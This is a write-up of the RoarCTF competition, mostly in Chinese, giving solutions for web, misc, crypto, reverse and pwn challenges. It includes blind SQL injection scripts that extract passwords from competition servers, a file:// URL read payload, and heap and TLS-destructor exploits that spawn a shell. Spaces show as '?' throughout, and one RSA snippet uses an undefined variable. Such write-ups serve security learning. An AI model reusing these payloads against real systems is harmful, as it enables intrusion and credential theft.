RoarCTF-WriteUp

WEB

ezsql

boolean payload:

username=admin'/**/%26%26/**/1=(case/**/when/**/2>3/**/THEN/**/(1)/**/ELSE/**/2/**/END)/**/%26%26/**/'1'='1&password=admin

password length 32

b4bc4c343ed120df3bff56d586e6d617

gml666

import?requests
import?time
import?string
def?inject(i,?ascii):
????url?=?'http://139.129.98.9:30003/login.php'
????payload?=?'''admin'/**/&&/**/1=(case/**/when/**/ascii(substr((password),{},1))={}/**/THEN/**/(1)/**/ELSE/**/2/**/END)/**/&&/**/'1'='1'''.format(i,?ascii)
????#?
????print(payload)
????postdata={
????????'password':?'admin',
????????'username':?payload
????}
????resp?=?requests.post(url,?data=postdata)
????if?resp.status_code==200:
????????if?'password?error'?in?resp.text:
????????????return?True
????return?False
res?=?''
#?b4bc4c343ed120df3bff56d586e6d617?gml666
#
for?i?in?range(len(res)+1,?len(res)+32):
????for?ascii?in?string.printable:
????????print("[-]%s?%d(%s)"%(i,?ord(ascii),?ascii))
????????if?inject(i,?ord(ascii)):
????????????res?+=?(ascii)
????????????print(res)
????????????break

应该是要找表名，但是select,union都用不了，看了一下版本是 mysql8 那就是需要利用 mysql8 的特性来注入了

('def','ctt',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null)<(table?information_schema.tables?limit?0,1);

ctt 是小于?mysql、information_schema、performance_schema、sys这几个系统库的，但是大于 ctf, 于是可以判断出来 ctf 库的数据表在information_schema.tables的位置

322 行开始

表:

admin

f11114g

列记录从3415行开始, 只有一列

password=admin&username=-1'/**/||/**/('flag{')<(table/**/ctf.f11114g/**/limit/**/1,1)#

flag{6a55e234-1ed0-455c-bbf3-6df6ddce9a57}

你能登陆成功吗

注入题，username 只能为 admin ，所以注入点在 password 。但是因为 password 不对，没办法走到后面

POST / HTTP/1.1
Host: 139.129.98.9:30005
Content-Length: 48
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36
Origin: http://139.129.98.9:30005
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://139.129.98.9:30005/
Accept-Encoding: gzip, deflate
Connection: close
username=admin&password=123'/**/and/**/1=1/**/--

时间盲注 payload:

admin'/**/and/**/1=(SELECT/**/1/**/FROM/**/pg_sleep(10))/**/--

利用

admin'/**/and/**/1=(case/**/when/**/1%3d1/**/then/**/(select/**/1/**/from/**/pg_sleep(5))/**/ELSE/**/1/**/END)/**/--

EXP:

import?requests
import?time
import?string
def?inject(i,?ascii):
????url?=?'http://139.129.98.9:30005/'
????payload?=?'''111'/**/or/**/1=(case/**/when/**/ascii(substr(users.password,{},1))={}/**/then/**/(select/**/1/**/from/**/pg_sleep(10))/**/ELSE/**/1/**/END)/**/--'''.format(i,?ascii)
????print(payload)
????postdata={
????????'username':?'admin',
????????'password':?payload
????}
????start_time=time.time()
????resp?=?requests.post(url,?data=postdata)
????end_time?=?time.time()
????if?int(end_time)-int(start_time)?>?5:
????????return?True
????return?False
res?=?'Pg5QL1sF4ns1N4T1n9'
for?i?in?range(len(res)+1,?len(res)+19):
????for?ascii?in?string.printable:
????????print("[-]%s?%d(%s)"%(i,?ord(ascii),?ascii))
????????if?inject(i,?ord(ascii)):
????????????res?+=?(ascii)
????????????print(res)
????????????break

密码Pg5QL1sF4ns1N4T1n9

flag{eb4aaa7f-1362-4f4c-9f5f-a7202518314b}

你能登陆成功吗-Revenge

直接用上面的 Exp 跑就行了，这次过滤了 password ，改成 Password 就能绕过了

import?requests
import?time
import?string
def?inject(i,?ascii):
????url?=?'http://139.129.98.9:30007/'
????payload?=?'''111'/**/or/**/1=(case/**/when/**/ascii(substr(users.PaSsword,{},1))={}/**/then/**/(select/**/1/**/from/**/pg_sleep(10))/**/ELSE/**/1/**/END)/**/--'''.format(i,?ascii)
????print(payload)
????postdata={
????????'username':?'admin',
????????'password':?payload
????}
????start_time=time.time()
????resp?=?requests.post(url,?data=postdata)
????end_time?=?time.time()
????if?int(end_time)-int(start_time)?>?6:
????????return?True
????return?False
#res?=?'S0rryF0Rm1st4ke111'
res?=?''
for?i?in?range(len(res)+1,?len(res)+19):
????for?ascii?in?string.printable:
????????print("[-]%s?%d(%s)"%(i,?ord(ascii),?ascii))
????????if?inject(i,?ord(ascii)):
????????????res?+=?(ascii)
????????????print(res)
????????????break

admin 密码S0rryF0Rm1st4ke111

flag{5f2561bb-685e-4b36-927b-89ec76fec285}

Misc

签到题

http://47.104.232.98:32571/?url=file:///fla%67

Hi_433MHz

直接看图吧。图中是f的bin对应起来

一共 9 位，最后一个可以删除，窄的为0，宽的为1。依次把每一块读出来 binary 之后转ascii即可

01100110?01101100?01100001?01100111?01111011?00110010?00110101?01100011?00110010?00110001?01100010?00110000?01100100?00101101?00110110?01100001?00110001?00110001?00101101?00110100?00110011?00110001?00110010?00101101?00111001?00110111?00110001?01100010?00101101?00110100?00110010?00111000?01100100?00110000?00110001?01100011?01100100?01100011?00110101?00110011?00110100?01111101

FM

flag{82c83416-dadc-4947-80df-b84852b8f35d}

float32?i+q?PCM
clc;
close?all;
clear?all;
fid=fopen('fm-sample-rate-2MHz.iq','r');
y=fread(fid,'float32');
fclose(fid);
i=numel(y)/2;
for?n=1:i
????ci(n)=y(2*n-1);
????cq(n)=y(2*n);
end
Sn(1)=0;
for?i=2:length(ci)??
Sn(i)?=-(cq(i)*ci(i-1)-cq(i-1)*ci(i));
end
fid=fopen('dem.dat','w+');
fwrite(fid,Sn,'float32');
fclose(fid);

audacity load dem.dat output mp3 //吐槽下1ed分不太清楚

Crypto

Crypto_System

from?pwn?import?*
from?itertools?import?product
from?hashlib?import?sha256
#?context.log_level?=?"debug"
ip?=?"139.129.98.9"
port?=?30001
sh?=?remote(ip,port)
def?login(sh):
????#?sh.recvlines(5)
????rec?=?sh.recvline().decode()
????suffix?=?re.findall(r'XXXX\+([^\)]+)',?rec)[0]
????digest?=?re.findall(r'==?([^\n]+)',?rec)[0]
????print(f"suffix:?{suffix}?\ndigest:?{digest}")
????print('Calculating?hash...')
????for?i?in?product(string.ascii_letters?+?string.digits,?repeat=4):
????????prefix?=?''.join(i)
????????guess?=?prefix?+?suffix
????????if?sha256(guess.encode()).hexdigest()?==?digest:
????????????print(guess)
????????????#?break
????????????sh.recvuntil(b'Give?me?XXXX:')
????????????sh.sendline(prefix.encode())
????????????return
from?Crypto.Util.number?import?*
from?gmpy2?import?powmod
#?These?three?are?constants
p?=?12039102490128509125925019010000012423515617235219127649182470182570195018265927223
g?=?10729072579307052184848302322451332192456229619044181105063011741516558110216720725
def?int2str(data,?mode="big"):
????if?mode?==?"little":
????????return?sum([ord(data[_])?*?2?**?(8?*?_)?for?_?in?range(len(data))])
????elif?mode?==?"big":
????????return?sum([ord(data[::-1][_])?*?2?**?(8?*?_)?for?_?in?range(len(data))])
def?get_parameter(m):
????x?=?int2str(m,?'little')
????y?=?powmod(g,?x,?p)
????#?g^x?mod?p
????a?=?bytes_to_long(sha256(long_to_bytes(y).rjust(128,?b"\x00")).digest())
????b?=?powmod(a,?a,?p?-?1)
????h?=?powmod(g,?b,?p)
????return?y,?h,?b
login(sh)
sh.recvuntil(b'frist?message(64?bytes):')
m1?=?bytes.fromhex(sh.recvline().strip().decode())
sh.recvuntil(b'second?message(64?bytes):')
m2?=?bytes.fromhex(sh.recvline().strip().decode())
sh.recvuntil(b':')
r?=?int(sh.recvline().strip().decode())
def?sign(m,r):
????y,?h,?b?=?get_parameter(m)
????s?=?(y?*?pow(h,?r,?p))?%?p
????return?str(r),?str(s)
x?=?int2str(m1.decode(),'little')
y,?h,?b?=?get_parameter(m1.decode())
target?=?(x+b*r)%(p-1)
x2?=?int2str(m2.decode(),'little')
y2,?h2,?b2?=?get_parameter(m2.decode())
b2r2?=?(x+b*r-x2)%(p-1)
r2?=?(b2r2*inverse(b2,p-1))//2

print(sign(m1.decode(),r))
print(sign(m2.decode(),r2))
sh.interactive()

Reverse

flag{b92d9b6c-e75d-4cbb-bc39-bf39a2f57c3f}

from?Crypto.Util.number?import?long_to_bytes
from?gmpy2?import?*
p?=?13299413764048930133302138749466137829470129709829516069778014310838093114516400589047888072065037035007023741009041669893387899867083575829855377403280423
q?=?11954360020159164180709939019047385560179850436770100207193049651260543609501871575909448998378290922795824941066935928157032997160163537467165365731882943
c?=?103728452309804750381455306214814700768557462686461157761076359181984554990431665209165298725569861567865645228742739676539208228770740802323555281253638825837621845841771677911598039696705908004858472132222470347720085501572979109563593281375095145984000628623881592799662103680478967594601571867412886606745
phi?=?(p-1)*(q-1)
e?=?65537
d?=?invert(e,phi)
m?=?pow(c,d,n)
print(long_to_bytes(m))

Pwn

2a1

exit中会调用__call_tls_dtors遍历tls_dtor_list调用函数，可以将tls_dtor_list覆盖为堆地址便可以控制调用函数和其参数

后续会将对堆中的内容进行循环右移和异或，所以我们需要leak异或的数值，然后再运算得到即可

由于远程tls_dtor_list的地址与本地不同，通过测试大概要爆破1/256

from?pwn?import?*
context.log_level?=?'debug'
#p?=?process("./2+1")
for?i?in?range(256):
???try:
??????p?=?remote("47.104.178.87",40444)
??????libc?=?ELF("./libc-2.23.so")
??????p.recvuntil("Gift:?0x")
??????libc.address?=?int(p.recv(12),?16)-libc.sym['alarm']
??????print?hex(libc.address)
??????#gdb.attach(p)
??????p.sendafter("read?:",?p64(libc.address-0x7ffff7a0d000+0x7ffff7ffcc70))
??????p.recv(6)
??????xor?=?u64(p.recv(8))
??????p.sendafter("write?:",?p64(libc.address+0x5006c0+0x1000*(256-i)))
??????num?=?(libc.sym['system'])^xor
??????print?hex(xor)
??????#gdb.attach(p)
??????p.sendafter("msg:?",?p64(((num>>47)|(num<<17))&0xffffffffffffffff)+p64(libc.search("/bin/sh").next()))
??????p.sendline("echo?123")
??????p.sendline("echo?123")
??????p.recvuntil("123")
??????p.interactive()
???except:
??????print?"fail",i

easy_pwn

edit可以负数溢出，导致可以越界写下一个符号的符号名地址和大小

这样就可以利用修改地址来任意读写，接下来修改malloc_hook即可getshell

from?pwn?import?*
context.log_level?=?'debug'
p?=?remote("47.105.44.8",?31760)
libc?=?ELF("./libc-2.23.so")
def?add(grammar):
?p.sendlineafter("your?choice:",?"1")
?p.sendlineafter("grammar:\n",?grammar)
def?edit(non,?size,?new):
?p.sendlineafter("your?choice:",?"4")
?p.sendlineafter("Non-Terminal:\n",?non)
?p.sendlineafter("size:",?str(size))
?p.send(new)
def?show():
?p.sendlineafter("your?choice:",?"2")
grammar?=?'''S?->?%s
A?->?S
exit'''%("a"*0x100)
add(grammar)
heap?=?""
edit('S',0xffffffff,?'\x00'*0x28+'\x68')
show()
p.recvuntil("\x2d\x3e\x20\x0a\x20\x20")
heap+=p.recv(1)
edit('\x00',0xffffffff,?'\x00'*0x28+'\x69')
show()
p.recvuntil("\x2d\x3e\x20\x0a\x20\x20")
heap+=p.recv(1)
edit('\x00',0xffffffff,?'\x00'*0x28+'\x6a')
show()
p.recvuntil("\x2d\x3e\x20\x0a\x20\x20")
heap+=p.recv(1)
edit('\x00',0xffffffff,?'\x00'*0x28+'\x6b')
show()
p.recvuntil("\x2d\x3e\x20\x0a\x20\x20")
heap+=p.recv(1)
edit('\x00',0xffffffff,?'\x00'*0x28+'\x6c')
show()
p.recvuntil("\x2d\x3e\x20\x0a\x20\x20")
heap+=p.recv(1)
edit('\x00',0xffffffff,?'\x00'*0x28+'\x6d')
show()
p.recvuntil("\x2d\x3e\x20\x0a\x20\x20")
heap+=p.recv(1)
heap?=?u64(heap+'\x00'*2)
print?hex(heap)
edit('\x00',0xffffffff,?'\x00'*0x28+p64(heap+0x1d0)+'\x08')
show()
p.recvuntil("\x2d\x3e\x20\x0a\x20\x20")
libc.address?=?u64(p.recv(6)+'\x00'*2)-0x7ffff7839b78+0x7ffff7475000
print?hex(libc.address)
edit('\x00',0xffffffff,?'\x00'*0x28+p64(libc.sym['__malloc_hook'])+'\x08')
edit('\x00'*8,?8,?p64(libc.address+0xf1207))
p.interactive()

Reverse

slime_war

魔塔- -

secret 5

• 输入whosyourdaddy

• 拿到magicbook在第二层38，6按t后最短路径到T

• 上隐藏层12后出来

• 属性值hash满足条件

• 打败boss

关键地址